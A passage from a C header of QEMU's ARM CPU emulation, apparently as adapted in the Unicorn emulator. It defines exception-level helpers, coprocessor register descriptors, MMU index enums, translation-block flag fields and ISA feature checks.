PL3_W) #define PL2_RW (PL2_R | PL2_W) #define PL1_RW (PL1_R | PL1_W) #define PL0_RW (PL0_R | PL0_W) /* Return the highest implemented Exception Level */ static inline int arm_highest_el(CPUARMState *env) { if (arm_feature(env, ARM_FEATURE_EL3)) { return 3; } if (arm_feature(env, ARM_FEATURE_EL2)) { return 2; } return 1; } /* Return true if a v7M CPU is in Handler mode */ static inline bool arm_v7m_is_handler_mode(CPUARMState *env) { return env->v7m.exception != 0; } /* Return the current Exception Level (as per ARMv8; note that this differs * from the ARMv7 Privilege Level). */ static inline int arm_current_el(CPUARMState *env) { if (arm_feature(env, ARM_FEATURE_M)) { return arm_v7m_is_handler_mode(env) || !(env->v7m.control[env->v7m.secure] & 1); } if (is_a64(env)) { return extract32(env->pstate, 2, 2); } switch (env->uncached_cpsr & 0x1f) { case ARM_CPU_MODE_USR: return 0; case ARM_CPU_MODE_HYP: return 2; case ARM_CPU_MODE_MON: return 3; default: if (arm_is_secure(env) && !arm_el_is_aa64(env, 3)) { /* If EL3 is 32-bit then all secure privileged modes run in * EL3 */ return 3; } return 1; } } typedef struct ARMCPRegInfo ARMCPRegInfo; typedef enum CPAccessResult { /* Access is permitted */ CP_ACCESS_OK = 0, /* Access fails due to a configurable trap or enable which would * result in a categorized exception syndrome giving information about * the failing instruction (ie syndrome category 0x3, 0x4, 0x5, 0x6, * 0xc or 0x18). The exception is taken to the usual target EL (EL1 or * PL1 if in EL0, otherwise to the current EL). */ CP_ACCESS_TRAP = 1, /* Access fails and results in an exception syndrome 0x0 ("uncategorized"). * Note that this is not a catch-all case -- the set of cases which may * result in this failure is specifically defined by the architecture. */ CP_ACCESS_TRAP_UNCATEGORIZED = 2, /* As CP_ACCESS_TRAP, but for traps directly to EL2 or EL3 */ CP_ACCESS_TRAP_EL2 = 3, CP_ACCESS_TRAP_EL3 = 4, /* As CP_ACCESS_UNCATEGORIZED, but for traps directly to EL2 or EL3 */ CP_ACCESS_TRAP_UNCATEGORIZED_EL2 = 5, CP_ACCESS_TRAP_UNCATEGORIZED_EL3 = 6, /* Access fails and results in an exception syndrome for an FP access, * trapped directly to EL2 or EL3 */ CP_ACCESS_TRAP_FP_EL2 = 7, CP_ACCESS_TRAP_FP_EL3 = 8, } CPAccessResult; /* Access functions for coprocessor registers. These cannot fail and * may not raise exceptions. */ typedef uint64_t CPReadFn(CPUARMState *env, const ARMCPRegInfo *opaque); typedef void CPWriteFn(CPUARMState *env, const ARMCPRegInfo *opaque, uint64_t value); /* Access permission check functions for coprocessor registers. */ typedef CPAccessResult CPAccessFn(CPUARMState *env, const ARMCPRegInfo *opaque, bool isread); /* Hook function for register reset */ typedef void CPResetFn(CPUARMState *env, const ARMCPRegInfo *opaque); #define CP_ANY 0xff /* Definition of an ARM coprocessor register */ struct ARMCPRegInfo { /* Name of register (useful mainly for debugging, need not be unique) */ const char *name; /* Location of register: coprocessor number and (crn,crm,opc1,opc2) * tuple. Any of crm, opc1 and opc2 may be CP_ANY to indicate a * 'wildcard' field -- any value of that field in the MRC/MCR insn * will be decoded to this register. The register read and write * callbacks will be passed an ARMCPRegInfo with the crn/crm/opc1/opc2 * used by the program, so it is possible to register a wildcard and * then behave differently on read/write if necessary. * For 64 bit registers, only crm and opc1 are relevant; crn and opc2 * must both be zero. * For AArch64-visible registers, opc0 is also used. * Since there are no "coprocessors" in AArch64, cp is purely used as a * way to distinguish (for KVM's benefit) guest-visible system registers * from demuxed ones provided to preserve the "no side effects on * KVM register read/write from QEMU" semantics. cp==0x13 is guest * visible (to match KVM's encoding); cp==0 will be converted to * cp==0x13 when the ARMCPRegInfo is registered, for convenience. */ uint8_t cp; uint8_t crn; uint8_t crm; uint8_t opc0; uint8_t opc1; uint8_t opc2; /* Execution state in which this register is visible: ARM_CP_STATE_* */ int state; /* Register type: ARM_CP_* bits/values */ int type; /* Access rights: PL*_[RW] */ int access; /* Security state: ARM_CP_SECSTATE_* bits/values */ int secure; /* The opaque pointer passed to define_arm_cp_regs_with_opaque() when * this register was defined: can be used to hand data through to the * register read/write functions, since they are passed the ARMCPRegInfo*. */ void *opaque; /* Value of this register, if it is ARM_CP_CONST. Otherwise, if * fieldoffset is non-zero, the reset value of the register. */ uint64_t resetvalue; /* Offset of the field in CPUARMState for this register. * * This is not needed if either: * 1. type is ARM_CP_CONST or one of the ARM_CP_SPECIALs * 2. both readfn and writefn are specified */ ptrdiff_t fieldoffset; /* offsetof(CPUARMState, field) */ /* Offsets of the secure and non-secure fields in CPUARMState for the * register if it is banked. These fields are only used during the static * registration of a register. During hashing the bank associated * with a given security state is copied to fieldoffset which is used from * there on out. * * It is expected that register definitions use either fieldoffset or * bank_fieldoffsets in the definition but not both. It is also expected * that both bank offsets are set when defining a banked register. This * use indicates that a register is banked. */ ptrdiff_t bank_fieldoffsets[2]; /* Function for making any access checks for this register in addition to * those specified by the 'access' permissions bits. If NULL, no extra * checks required. The access check is performed at runtime, not at * translate time. */ CPAccessFn *accessfn; /* Function for handling reads of this register. If NULL, then reads * will be done by loading from the offset into CPUARMState specified * by fieldoffset. */ CPReadFn *readfn; /* Function for handling writes of this register. If NULL, then writes * will be done by writing to the offset into CPUARMState specified * by fieldoffset. */ CPWriteFn *writefn; /* Function for doing a "raw" read; used when we need to copy * coprocessor state to the kernel for KVM or out for * migration. This only needs to be provided if there is also a * readfn and it has side effects (for instance clear-on-read bits). */ CPReadFn *raw_readfn; /* Function for doing a "raw" write; used when we need to copy KVM * kernel coprocessor state into userspace, or for inbound * migration. This only needs to be provided if there is also a * writefn and it masks out "unwritable" bits or has write-one-to-clear * or similar behaviour. */ CPWriteFn *raw_writefn; /* Function for resetting the register. If NULL, then reset will be done * by writing resetvalue to the field specified in fieldoffset. If * fieldoffset is 0 then no reset will be done. */ CPResetFn *resetfn; /* * "Original" writefn and readfn. * For ARMv8.1-VHE register aliases, we overwrite the read/write * accessor functions of various EL1/EL0 to perform the runtime * check for which sysreg should actually be modified, and then * forwards the operation. Before overwriting the accessors, * the original function is copied here, so that accesses that * really do go to the EL1/EL0 version proceed normally. * (The corresponding EL2 register is linked via opaque.) */ CPReadFn *orig_readfn; CPWriteFn *orig_writefn; }; /* Macros which are lvalues for the field in CPUARMState for the * ARMCPRegInfo *ri. */ #define CPREG_FIELD32(env, ri) \ (*(uint32_t *)((char *)(env) + (ri)->fieldoffset)) #define CPREG_FIELD64(env, ri) \ (*(uint64_t *)((char *)(env) + (ri)->fieldoffset)) #define REGINFO_SENTINEL { .type = ARM_CP_SENTINEL } void define_arm_cp_regs_with_opaque(ARMCPU *cpu, const ARMCPRegInfo *regs, void *opaque); void define_one_arm_cp_reg_with_opaque(ARMCPU *cpu, const ARMCPRegInfo *regs, void *opaque); static inline void define_arm_cp_regs(ARMCPU *cpu, const ARMCPRegInfo *regs) { define_arm_cp_regs_with_opaque(cpu, regs, 0); } static inline void define_one_arm_cp_reg(ARMCPU *cpu, const ARMCPRegInfo *regs) { define_one_arm_cp_reg_with_opaque(cpu, regs, 0); } const ARMCPRegInfo *get_arm_cp_reginfo(GHashTable *cpregs, uint32_t encoded_cp); /* * Definition of an ARM co-processor register as viewed from * userspace. This is used for presenting sanitised versions of * registers to userspace when emulating the Linux AArch64 CPU * ID/feature ABI (advertised as HWCAP_CPUID). */ typedef struct ARMCPRegUserSpaceInfo { /* Name of register */ const char *name; /* Is the name actually a glob pattern */ bool is_glob; /* Only some bits are exported to user space */ uint64_t exported_bits; /* Fixed bits are applied after the mask */ uint64_t fixed_bits; } ARMCPRegUserSpaceInfo; #define REGUSERINFO_SENTINEL { .name = NULL } void modify_arm_cp_regs(ARMCPRegInfo *regs, const ARMCPRegUserSpaceInfo *mods); /* CPWriteFn that can be used to implement writes-ignored behaviour */ void arm_cp_write_ignore(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value); /* CPReadFn that can be used for read-as-zero behaviour */ uint64_t arm_cp_read_zero(CPUARMState *env, const ARMCPRegInfo *ri); /* CPResetFn that does nothing, for use if no reset is required even * if fieldoffset is non zero. */ void arm_cp_reset_ignore(CPUARMState *env, const ARMCPRegInfo *opaque); /* Return true if this reginfo struct's field in the cpu state struct * is 64 bits wide. */ static inline bool cpreg_field_is_64bit(const ARMCPRegInfo *ri) { return (ri->state == ARM_CP_STATE_AA64) || (ri->type & ARM_CP_64BIT); } static inline bool cp_access_ok(int current_el, const ARMCPRegInfo *ri, int isread) { return (ri->access >> ((current_el * 2) + isread)) & 1; } /* Raw read of a coprocessor register (as needed for migration, etc) */ uint64_t read_raw_cp_reg(CPUARMState *env, const ARMCPRegInfo *ri); /** * write_list_to_cpustate * @cpu: ARMCPU * * For each register listed in the ARMCPU cpreg_indexes list, write * its value from the cpreg_values list into the ARMCPUState structure. * This updates TCG's working data structures from KVM data or * from incoming migration state. * * Returns: true if all register values were updated correctly, * false if some register was unknown or could not be written. * Note that we do not stop early on failure -- we will attempt * writing all registers in the list. */ bool write_list_to_cpustate(ARMCPU *cpu); /** * write_cpustate_to_list: * @cpu: ARMCPU * @kvm_sync: true if this is for syncing back to KVM * * For each register listed in the ARMCPU cpreg_indexes list, write * its value from the ARMCPUState structure into the cpreg_values list. * This is used to copy info from TCG's working data structures into * KVM or for outbound migration. * * @kvm_sync is true if we are doing this in order to sync the * register state back to KVM. In this case we will only update * values in the list if the previous list->cpustate sync actually * successfully wrote the CPU state. Otherwise we will keep the value * that is in the list. * * Returns: true if all register values were read correctly, * false if some register was unknown or could not be read. * Note that we do not stop early on failure -- we will attempt * reading all registers in the list. */ bool write_cpustate_to_list(ARMCPU *cpu, bool kvm_sync); #define ARM_CPUID_TI915T 0x54029152 #define ARM_CPUID_TI925T 0x54029252 #define ARM_CPU_TYPE_SUFFIX "-" TYPE_ARM_CPU #define ARM_CPU_TYPE_NAME(name) (name ARM_CPU_TYPE_SUFFIX) #define CPU_RESOLVING_TYPE TYPE_ARM_CPU #define cpu_signal_handler cpu_arm_signal_handler #define cpu_list arm_cpu_list /* ARM has the following "translation regimes" (as the ARM ARM calls them): * * If EL3 is 64-bit: * + NonSecure EL1 & 0 stage 1 * + NonSecure EL1 & 0 stage 2 * + NonSecure EL2 * + NonSecure EL2 & 0 (ARMv8.1-VHE) * + Secure EL1 & 0 * + Secure EL3 * If EL3 is 32-bit: * + NonSecure PL1 & 0 stage 1 * + NonSecure PL1 & 0 stage 2 * + NonSecure PL2 * + Secure PL0 * + Secure PL1 * (reminder: for 32 bit EL3, Secure PL1 is *EL3*, not EL1.) * * For QEMU, an mmu_idx is not quite the same as a translation regime because: * 1. we need to split the "EL1 & 0" and "EL2 & 0" regimes into two mmu_idxes, * because they may differ in access permissions even if the VA->PA map is * the same * 2. we want to cache in our TLB the full VA->IPA->PA lookup for a stage 1+2 * translation, which means that we have one mmu_idx that deals with two * concatenated translation regimes [this sort of combined s1+2 TLB is * architecturally permitted] * 3. we don't need to allocate an mmu_idx to translations that we won't be * handling via the TLB. The only way to do a stage 1 translation without * the immediate stage 2 translation is via the ATS or AT system insns, * which can be slow-pathed and always do a page table walk. * 4. we can also safely fold together the "32 bit EL3" and "64 bit EL3" * translation regimes, because they map reasonably well to each other * and they can't both be active at the same time. * 5. we want to be able to use the TLB for accesses done as part of a * stage1 page table walk, rather than having to walk the stage2 page * table over and over. * 6. we need separate EL1/EL2 mmu_idx for handling the Privileged Access * Never (PAN) bit within PSTATE. * * This gives us the following list of cases: * * NS EL0 EL1&0 stage 1+2 (aka NS PL0) * NS EL1 EL1&0 stage 1+2 (aka NS PL1) * NS EL1 EL1&0 stage 1+2 +PAN * NS EL0 EL2&0 * NS EL2 EL2&0 +PAN * NS EL2 (aka NS PL2) * S EL0 EL1&0 (aka S PL0) * S EL1 EL1&0 (not used if EL3 is 32 bit) * S EL1 EL1&0 +PAN * S EL3 (aka S PL1) * NS EL1&0 stage 2 * * for a total of 12 different mmu_idx. * * R profile CPUs have an MPU, but can use the same set of MMU indexes * as A profile. They only need to distinguish NS EL0 and NS EL1 (and * NS EL2 if we ever model a Cortex-R52). * * M profile CPUs are rather different as they do not have a true MMU. * They have the following different MMU indexes: * User * Privileged * User, execution priority negative (ie the MPU HFNMIENA bit may apply) * Privileged, execution priority negative (ditto) * If the CPU supports the v8M Security Extension then there are also: * Secure User * Secure Privileged * Secure User, execution priority negative * Secure Privileged, execution priority negative * * The ARMMMUIdx and the mmu index value used by the core QEMU TLB code * are not quite the same -- different CPU types (most notably M profile * vs A/R profile) would like to use MMU indexes with different semantics, * but since we don't ever need to use all of those in a single CPU we * can avoid setting NB_MMU_MODES to more than 8. The lower bits of * ARMMMUIdx are the core TLB mmu index, and the higher bits are always * the same for any particular CPU. * Variables of type ARMMUIdx are always full values, and the core * index values are in variables of type 'int'. * * Our enumeration includes at the end some entries which are not "true" * mmu_idx values in that they don't have corresponding TLBs and are only * valid for doing slow path page table walks. * * The constant names here are patterned after the general style of the names * of the AT/ATS operations. * The values used are carefully arranged to make mmu_idx => EL lookup easy. * For M profile we arrange them to have a bit for priv, a bit for negpri * and a bit for secure. */ #define ARM_MMU_IDX_A 0x10 /* A profile */ #define ARM_MMU_IDX_NOTLB 0x20 /* does not have a TLB */ #define ARM_MMU_IDX_M 0x40 /* M profile */ /* Meanings of the bits for M profile mmu idx values */ #define ARM_MMU_IDX_M_PRIV 0x1 #define ARM_MMU_IDX_M_NEGPRI 0x2 #define ARM_MMU_IDX_M_S 0x4 /* Secure */ #define ARM_MMU_IDX_TYPE_MASK \ (ARM_MMU_IDX_A | ARM_MMU_IDX_M | ARM_MMU_IDX_NOTLB) #define ARM_MMU_IDX_COREIDX_MASK 0xf typedef enum ARMMMUIdx { /* * A-profile. */ ARMMMUIdx_E10_0 = 0 | ARM_MMU_IDX_A, ARMMMUIdx_E20_0 = 1 | ARM_MMU_IDX_A, ARMMMUIdx_E10_1 = 2 | ARM_MMU_IDX_A, ARMMMUIdx_E10_1_PAN = 3 | ARM_MMU_IDX_A, ARMMMUIdx_E2 = 4 | ARM_MMU_IDX_A, ARMMMUIdx_E20_2 = 5 | ARM_MMU_IDX_A, ARMMMUIdx_E20_2_PAN = 6 | ARM_MMU_IDX_A, ARMMMUIdx_SE10_0 = 7 | ARM_MMU_IDX_A, ARMMMUIdx_SE10_1 = 8 | ARM_MMU_IDX_A, ARMMMUIdx_SE10_1_PAN = 9 | ARM_MMU_IDX_A, ARMMMUIdx_SE3 = 10 | ARM_MMU_IDX_A, ARMMMUIdx_Stage2 = 11 | ARM_MMU_IDX_A, /* * These are not allocated TLBs and are used only for AT system * instructions or for the first stage of an S12 page table walk. */ ARMMMUIdx_Stage1_E0 = 0 | ARM_MMU_IDX_NOTLB, ARMMMUIdx_Stage1_E1 = 1 | ARM_MMU_IDX_NOTLB, ARMMMUIdx_Stage1_E1_PAN = 2 | ARM_MMU_IDX_NOTLB, /* * M-profile. */ ARMMMUIdx_MUser = ARM_MMU_IDX_M, ARMMMUIdx_MPriv = ARM_MMU_IDX_M | ARM_MMU_IDX_M_PRIV, ARMMMUIdx_MUserNegPri = ARMMMUIdx_MUser | ARM_MMU_IDX_M_NEGPRI, ARMMMUIdx_MPrivNegPri = ARMMMUIdx_MPriv | ARM_MMU_IDX_M_NEGPRI, ARMMMUIdx_MSUser = ARMMMUIdx_MUser | ARM_MMU_IDX_M_S, ARMMMUIdx_MSPriv = ARMMMUIdx_MPriv | ARM_MMU_IDX_M_S, ARMMMUIdx_MSUserNegPri = ARMMMUIdx_MUserNegPri | ARM_MMU_IDX_M_S, ARMMMUIdx_MSPrivNegPri = ARMMMUIdx_MPrivNegPri | ARM_MMU_IDX_M_S, } ARMMMUIdx; /* * Bit macros for the core-mmu-index values for each index, * for use when calling tlb_flush_by_mmuidx() and friends. */ #define TO_CORE_BIT(NAME) \ ARMMMUIdxBit_##NAME = 1 << (ARMMMUIdx_##NAME & ARM_MMU_IDX_COREIDX_MASK) typedef enum ARMMMUIdxBit { TO_CORE_BIT(E10_0), TO_CORE_BIT(E20_0), TO_CORE_BIT(E10_1), TO_CORE_BIT(E10_1_PAN), TO_CORE_BIT(E2), TO_CORE_BIT(E20_2), TO_CORE_BIT(E20_2_PAN), TO_CORE_BIT(SE10_0), TO_CORE_BIT(SE10_1), TO_CORE_BIT(SE10_1_PAN), TO_CORE_BIT(SE3), TO_CORE_BIT(Stage2), TO_CORE_BIT(MUser), TO_CORE_BIT(MPriv), TO_CORE_BIT(MUserNegPri), TO_CORE_BIT(MPrivNegPri), TO_CORE_BIT(MSUser), TO_CORE_BIT(MSPriv), TO_CORE_BIT(MSUserNegPri), TO_CORE_BIT(MSPrivNegPri), } ARMMMUIdxBit; #undef TO_CORE_BIT #define MMU_USER_IDX 0 /* Indexes used when registering address spaces with cpu_address_space_init */ typedef enum ARMASIdx { ARMASIdx_NS = 0, ARMASIdx_S = 1, } ARMASIdx; /* Return the Exception Level targeted by debug exceptions. */ static inline int arm_debug_target_el(CPUARMState *env) { bool secure = arm_is_secure(env); bool route_to_el2 = false; if (arm_feature(env, ARM_FEATURE_EL2) && !secure) { route_to_el2 = env->cp15.hcr_el2 & HCR_TGE || env->cp15.mdcr_el2 & MDCR_TDE; } if (route_to_el2) { return 2; } else if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && secure) { return 3; } else { return 1; } } static inline bool arm_v7m_csselr_razwi(ARMCPU *cpu) { /* If all the CLIDR.Ctypem bits are 0 there are no caches, and * CSSELR is RAZ/WI. */ return (cpu->clidr & R_V7M_CLIDR_CTYPE_ALL_MASK) != 0; } /* See AArch64.GenerateDebugExceptionsFrom() in ARM ARM pseudocode */ static inline bool aa64_generate_debug_exceptions(CPUARMState *env) { int cur_el = arm_current_el(env); int debug_el; if (cur_el == 3) { return false; } /* MDCR_EL3.SDD disables debug events from Secure state */ if (arm_is_secure_below_el3(env) && extract32(env->cp15.mdcr_el3, 16, 1)) { return false; } /* * Same EL to same EL debug exceptions need MDSCR_KDE enabled * while not masking the (D)ebug bit in DAIF. */ debug_el = arm_debug_target_el(env); if (cur_el == debug_el) { return extract32(env->cp15.mdscr_el1, 13, 1) && !(env->daif & PSTATE_D); } /* Otherwise the debug target needs to be a higher EL */ return debug_el > cur_el; } static inline bool aa32_generate_debug_exceptions(CPUARMState *env) { int el = arm_current_el(env); if (el == 0 && arm_el_is_aa64(env, 1)) { return aa64_generate_debug_exceptions(env); } if (arm_is_secure(env)) { int spd; if (el == 0 && (env->cp15.sder & 1)) { /* SDER.SUIDEN means debug exceptions from Secure EL0 * are always enabled. Otherwise they are controlled by * SDCR.SPD like those from other Secure ELs. */ return true; } spd = extract32(env->cp15.mdcr_el3, 14, 2); switch (spd) { case 1: /* SPD == 0b01 is reserved, but behaves as 0b00. */ case 0: /* For 0b00 we return true if external secure invasive debug * is enabled. On real hardware this is controlled by external * signals to the core. QEMU always permits debug, and behaves * as if DBGEN, SPIDEN, NIDEN and SPNIDEN are all tied high. */ return true; case 2: return false; case 3: return true; } } return el != 2; } /* Return true if debugging exceptions are currently enabled. * This corresponds to what in ARM ARM pseudocode would be * if UsingAArch32() then * return AArch32.GenerateDebugExceptions() * else * return AArch64.GenerateDebugExceptions() * We choose to push the if() down into this function for clarity, * since the pseudocode has it at all callsites except for the one in * CheckSoftwareStep(), where it is elided because both branches would * always return the same value. */ static inline bool arm_generate_debug_exceptions(CPUARMState *env) { if (env->aarch64) { return aa64_generate_debug_exceptions(env); } else { return aa32_generate_debug_exceptions(env); } } /* Is single-stepping active? (Note that the "is EL_D AArch64?" check * implicitly means this always returns false in pre-v8 CPUs.) */ static inline bool arm_singlestep_active(CPUARMState *env) { return extract32(env->cp15.mdscr_el1, 0, 1) && arm_el_is_aa64(env, arm_debug_target_el(env)) && arm_generate_debug_exceptions(env); } static inline bool arm_sctlr_b(CPUARMState *env) { return /* We need not implement SCTLR.ITD in user-mode emulation, so * let linux-user ignore the fact that it conflicts with SCTLR_B. * This lets people run BE32 binaries with "-cpu any". */ // Unicorn: Our hack to support BE32 mode // !arm_feature(env, ARM_FEATURE_V7) && (env->cp15.sctlr_el[1] & SCTLR_B) != 0; } uint64_t arm_sctlr(CPUARMState *env, int el); static inline bool arm_cpu_data_is_big_endian_a32(CPUARMState *env, bool sctlr_b) { /* In 32bit endianness is determined by looking at CPSR's E bit */ return env->uncached_cpsr & CPSR_E; } static inline bool arm_cpu_data_is_big_endian_a64(int el, uint64_t sctlr) { return sctlr & (el ? SCTLR_EE : SCTLR_E0E); } /* Return true if the processor is in big-endian mode. */ static inline bool arm_cpu_data_is_big_endian(CPUARMState *env) { if (!is_a64(env)) { return arm_cpu_data_is_big_endian_a32(env, arm_sctlr_b(env)); } else { int cur_el = arm_current_el(env); uint64_t sctlr = arm_sctlr(env, cur_el); return arm_cpu_data_is_big_endian_a64(cur_el, sctlr); } } typedef CPUARMState CPUArchState; typedef ARMCPU ArchCPU; #include "exec/cpu-all.h" /* * Bit usage in the TB flags field: bit 31 indicates whether we are * in 32 or 64 bit mode. The meaning of the other bits depends on that. * We put flags which are shared between 32 and 64 bit mode at the top * of the word, and flags which apply to only one mode at the bottom. * * 31 20 18 14 9 0 * +--------------+-----+-----+----------+--------------+ * | | | TBFLAG_A32 | | * | | +-----+----------+ TBFLAG_AM32 | * | TBFLAG_ANY | |TBFLAG_M32| | * | | +-+----------+--------------| * | | | TBFLAG_A64 | * +--------------+---------+---------------------------+ * 31 20 15 0 * * Unless otherwise noted, these bits are cached in env->hflags. */ FIELD(TBFLAG_ANY, AARCH64_STATE, 31, 1) FIELD(TBFLAG_ANY, SS_ACTIVE, 30, 1) FIELD(TBFLAG_ANY, PSTATE_SS, 29, 1) /* Not cached. */ FIELD(TBFLAG_ANY, BE_DATA, 28, 1) FIELD(TBFLAG_ANY, MMUIDX, 24, 4) /* Target EL if we take a floating-point-disabled exception */ FIELD(TBFLAG_ANY, FPEXC_EL, 22, 2) /* For A-profile only, target EL for debug exceptions. */ FIELD(TBFLAG_ANY, DEBUG_TARGET_EL, 20, 2) /* * Bit usage when in AArch32 state, both A- and M-profile. */ FIELD(TBFLAG_AM32, CONDEXEC, 0, 8) /* Not cached. */ FIELD(TBFLAG_AM32, THUMB, 8, 1) /* Not cached. */ /* * Bit usage when in AArch32 state, for A-profile only. */ FIELD(TBFLAG_A32, VECLEN, 9, 3) /* Not cached. */ FIELD(TBFLAG_A32, VECSTRIDE, 12, 2) /* Not cached. */ /* * We store the bottom two bits of the CPAR as TB flags and handle * checks on the other bits at runtime. This shares the same bits as * VECSTRIDE, which is OK as no XScale CPU has VFP. * Not cached, because VECLEN+VECSTRIDE are not cached. */ FIELD(TBFLAG_A32, XSCALE_CPAR, 12, 2) FIELD(TBFLAG_A32, VFPEN, 14, 1) /* Partially cached, minus FPEXC. */ FIELD(TBFLAG_A32, SCTLR_B, 15, 1) FIELD(TBFLAG_A32, HSTR_ACTIVE, 16, 1) /* * Indicates whether cp register reads and writes by guest code should access * the secure or nonsecure bank of banked registers; note that this is not * the same thing as the current security state of the processor! */ FIELD(TBFLAG_A32, NS, 17, 1) /* * Bit usage when in AArch32 state, for M-profile only. */ /* Handler (ie not Thread) mode */ FIELD(TBFLAG_M32, HANDLER, 9, 1) /* Whether we should generate stack-limit checks */ FIELD(TBFLAG_M32, STACKCHECK, 10, 1) /* Set if FPCCR.LSPACT is set */ FIELD(TBFLAG_M32, LSPACT, 11, 1) /* Not cached. */ /* Set if we must create a new FP context */ FIELD(TBFLAG_M32, NEW_FP_CTXT_NEEDED, 12, 1) /* Not cached. */ /* Set if FPCCR.S does not match current security state */ FIELD(TBFLAG_M32, FPCCR_S_WRONG, 13, 1) /* Not cached. */ /* * Bit usage when in AArch64 state */ FIELD(TBFLAG_A64, TBII, 0, 2) FIELD(TBFLAG_A64, SVEEXC_EL, 2, 2) FIELD(TBFLAG_A64, ZCR_LEN, 4, 4) FIELD(TBFLAG_A64, PAUTH_ACTIVE, 8, 1) FIELD(TBFLAG_A64, BT, 9, 1) FIELD(TBFLAG_A64, BTYPE, 10, 2) /* Not cached. */ FIELD(TBFLAG_A64, TBID, 12, 2) FIELD(TBFLAG_A64, UNPRIV, 14, 1) /** * cpu_mmu_index: * @env: The cpu environment * @ifetch: True for code access, false for data access. * * Return the core mmu index for the current translation regime. * This function is used by generic TCG code paths. */ static inline int cpu_mmu_index(CPUARMState *env, bool ifetch) { return FIELD_EX32(env->hflags, TBFLAG_ANY, MMUIDX); } static inline bool bswap_code(bool sctlr_b) { /* All code access in ARM is little endian, and there are no loaders * doing swaps that need to be reversed */ // return 0; // Unicorn: Our hack to support BE32 for system emulation, which // I believe shouldn't have existed... return sctlr_b; } void cpu_get_tb_cpu_state(CPUARMState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags); enum { QEMU_PSCI_CONDUIT_DISABLED = 0, QEMU_PSCI_CONDUIT_SMC = 1, QEMU_PSCI_CONDUIT_HVC = 2, }; /* Return the address space index to use for a memory access */ static inline int arm_asidx_from_attrs(CPUState *cs, MemTxAttrs attrs) { return attrs.secure ? ARMASIdx_S : ARMASIdx_NS; } /* Return the AddressSpace to use for a memory access * (which depends on whether the access is S or NS, and whether * the board gave us a separate AddressSpace for S accesses). */ static inline AddressSpace *arm_addressspace(CPUState *cs, MemTxAttrs attrs) { return cpu_get_address_space(cs, arm_asidx_from_attrs(cs, attrs)); } /** * arm_rebuild_hflags: * Rebuild the cached TBFLAGS for arbitrary changed processor state. */ void arm_rebuild_hflags(CPUARMState *env); /** * aa32_vfp_dreg: * Return a pointer to the Dn register within env in 32-bit mode. */ static inline uint64_t *aa32_vfp_dreg(CPUARMState *env, unsigned regno) { return &env->vfp.zregs[regno >> 1].d[regno & 1]; } /** * aa32_vfp_qreg: * Return a pointer to the Qn register within env in 32-bit mode. */ static inline uint64_t *aa32_vfp_qreg(CPUARMState *env, unsigned regno) { return &env->vfp.zregs[regno].d[0]; } /** * aa64_vfp_qreg: * Return a pointer to the Qn register within env in 64-bit mode. */ static inline uint64_t *aa64_vfp_qreg(CPUARMState *env, unsigned regno) { return &env->vfp.zregs[regno].d[0]; } /* Shared between translate-sve.c and sve_helper.c. */ extern const uint64_t pred_esz_masks[4]; /* * Naming convention for isar_feature functions: * Functions which test 32-bit ID registers should have _aa32_ in * their name. Functions which test 64-bit ID registers should have * _aa64_ in their name. These must only be used in code where we * know for certain that the CPU has AArch32 or AArch64 respectively * or where the correct answer for a CPU which doesn't implement that * CPU state is "false" (eg when generating A32 or A64 code, if adding * system registers that are specific to that CPU state, for "should * we let this system register bit be set" tests where the 32-bit * flavour of the register doesn't have the bit, and so on). * Functions which simply ask "does this feature exist at all" have * _any_ in their name, and always return the logical OR of the _aa64_ * and the _aa32_ function. */ /* * 32-bit feature tests via id registers. */ static inline bool isar_feature_aa32_thumb_div(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar0, ID_ISAR0, DIVIDE) != 0; } static inline bool isar_feature_aa32_arm_div(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar0, ID_ISAR0, DIVIDE) > 1; } static inline bool isar_feature_aa32_jazelle(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar1, ID_ISAR1, JAZELLE) != 0; } static inline bool isar_feature_aa32_aes(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, AES) != 0; } static inline bool isar_feature_aa32_pmull(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, AES) > 1; } static inline bool isar_feature_aa32_sha1(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, SHA1) != 0; } static inline bool isar_feature_aa32_sha2(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, SHA2) != 0; } static inline bool isar_feature_aa32_crc32(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, CRC32) != 0; } static inline bool isar_feature_aa32_rdm(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, RDM) != 0; } static inline bool isar_feature_aa32_vcma(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, VCMA) != 0; } static inline bool isar_feature_aa32_jscvt(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, JSCVT) != 0; } static inline bool isar_feature_aa32_dp(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, DP) != 0; } static inline bool isar_feature_aa32_fhm(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, FHM) != 0; } static inline bool isar_feature_aa32_sb(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, SB) != 0; } static inline bool isar_feature_aa32_predinv(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, SPECRES) != 0; } static inline bool isar_feature_aa32_fp16_arith(const ARMISARegisters *id) { /* * This is a placeholder for use by VCMA until the rest of * the ARMv8.2-FP16 extension is implemented for aa32 mode. * At which point we can properly set and check MVFR1.FPHP. */ return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, FP) == 1; } static inline bool isar_feature_aa32_vfp_simd(const ARMISARegisters *id) { /* * Return true if either VFP or SIMD is implemented. * In this case, a minimum of VFP w/ D0-D15. */ return FIELD_EX32(id->mvfr0, MVFR0, SIMDREG) > 0; } static inline bool isar_feature_aa32_simd_r32(const ARMISARegisters *id) { /* Return true if D16-D31 are implemented */ return FIELD_EX32(id->mvfr0, MVFR0, SIMDREG) >= 2; } static inline bool isar_feature_aa32_fpshvec(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr0, MVFR0, FPSHVEC) > 0; } static inline bool isar_feature_aa32_fpsp_v2(const ARMISARegisters *id) { /* Return true if 